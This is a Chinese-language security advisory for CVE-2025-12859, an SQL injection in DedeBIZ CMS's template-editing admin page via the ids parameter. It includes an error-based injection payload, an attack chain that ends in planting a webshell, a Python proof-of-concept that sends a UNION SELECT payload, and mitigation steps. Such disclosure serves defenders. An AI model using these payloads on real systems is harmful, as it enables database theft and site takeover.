DedeBIZ templets_one_edit.php SQL注入漏洞 (CVE-2025-12859)

漏洞信息

漏洞编号

CVE-2025-12859

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

DedeBIZ

漏洞概述

DedeBIZ是一款基于PHP开发的内容管理系统(CMS)，广泛应用于企业网站和内容管理平台。该系统被发现在/admin/templets_one_edit.php文件中存在SQL注入漏洞，攻击者可以通过操控ids参数实现未授权的数据库操作。漏洞影响DedeBIZ 6.3.2及之前版本。由于该漏洞需要高权限认证才能利用，且攻击复杂度较低，CVSS评分达到4.7分，属于中等严重程度。攻击者成功利用此漏洞可读取、修改或删除数据库中的敏感信息，包括用户凭证、管理员账号等数据。此漏洞已在公开渠道披露，攻击代码已在互联网流传，建议受影响用户尽快采取防护措施。

技术细节

该SQL注入漏洞位于DedeBIZ管理后台的模板编辑功能模块。具体来说，漏洞存在于/admin/templets_one_edit.php文件中的ids参数处理逻辑。系统在处理用户提交的ids参数时，未对输入进行充分的SQL语句过滤和参数化处理，导致攻击者可以通过构造恶意SQL语句片段实现注入攻击。攻击者需要具备管理后台访问权限（高权限用户），通过构造类似ids=1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT DATABASE()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)的Payload来获取数据库敏感信息。由于该参数直接拼接到SQL查询语句中，攻击者可以实现联合查询、布尔盲注或时间盲注等攻击手法，进而枚举数据库结构、提取用户密码哈希、甚至通过OUTFILE等函数写入恶意文件。漏洞的利用需要HTTP请求访问目标服务器，属于网络可达的远程攻击。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用DedeBIZ CMS系统，并定位管理后台入口

STEP 2

权限获取

通过弱口令、凭证泄露或社会工程学获取管理员级别账号访问权限

STEP 3

构造Payload

攻击者构造恶意SQL语句作为ids参数值，如使用UNION SELECT或布尔盲注技术

STEP 4

发送恶意请求

通过HTTP GET请求将构造的Payload发送至/admin/templets_one_edit.php文件

STEP 5

数据提取

根据响应内容解析返回的数据库信息，或通过盲注时间差异判断注入成功

STEP 6

持久化控制

进一步利用注入点写入Webshell或提取管理员密码，实现长期控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

def cve_2025_12859_poc(target_url):
    """
    CVE-2025-12859 - DedeBIZ SQL Injection in /admin/templets_one_edit.php
    Target: DedeBIZ <= 6.3.2
    Vulnerability: SQL Injection via 'ids' parameter
    """
    # Normalize target URL
    if not target_url.endswith('/'):
        target_url += '/'
    
    # Construct exploit URL with SQL injection payload
    # Payload extracts database version using UNION-based injection
    payload = "1 UNION SELECT 1,2,VERSION(),4,5,6,7,8,9,10--"
    exploit_url = f"{target_url}admin/templets_one_edit.php?ids={payload}"
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploit URL: {exploit_url}")
    
    try:
        response = requests.get(exploit_url, timeout=10)
        
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        
        if response.status_code == 200:
            # Check for database version in response
            if '5.' in response.text or '8.' in response.text or '10.' in response.text:
                print("[+] Potential SQL Injection - Database info found in response")
                # Extract and display relevant portion
                if 'MySQL' in response.text or 'MariaDB' in response.text:
                    print("[+] Database type detected in response")
                    return True
        
        print("[-] No obvious injection detected or authentication required")
        return False
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    cve_2025_12859_poc(sys.argv[1])

影响范围

DedeBIZ <= 6.3.2

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1) 通过Web服务器配置（如Nginx/Apache的location规则）限制对/admin/templets_one_edit.php的直接访问，仅允许可信IP访问；2) 在Web应用层添加SQL注入检测和拦截逻辑，过滤ids参数中的SQL关键字；3) 临时关闭模板编辑功能模块；4) 加强管理员账号安全，使用强密码并启用双因素认证；5) 监控Web访问日志，排查异常的SQL注入探测行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12859
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12859
3 Details https://www.cvedetails.com/cve/CVE-2025-12859/
4 VulDB https://vuldb.com/cve/CVE-2025-12859
5 Link https://github.com/ZZCTD/zz_test/issues/1
6 Link https://vuldb.com/?ctiid.331506
7 Link https://vuldb.com/?id.331506
8 Link https://vuldb.com/?submit.679106
9 Link https://github.com/ZZCTD/zz_test/issues/1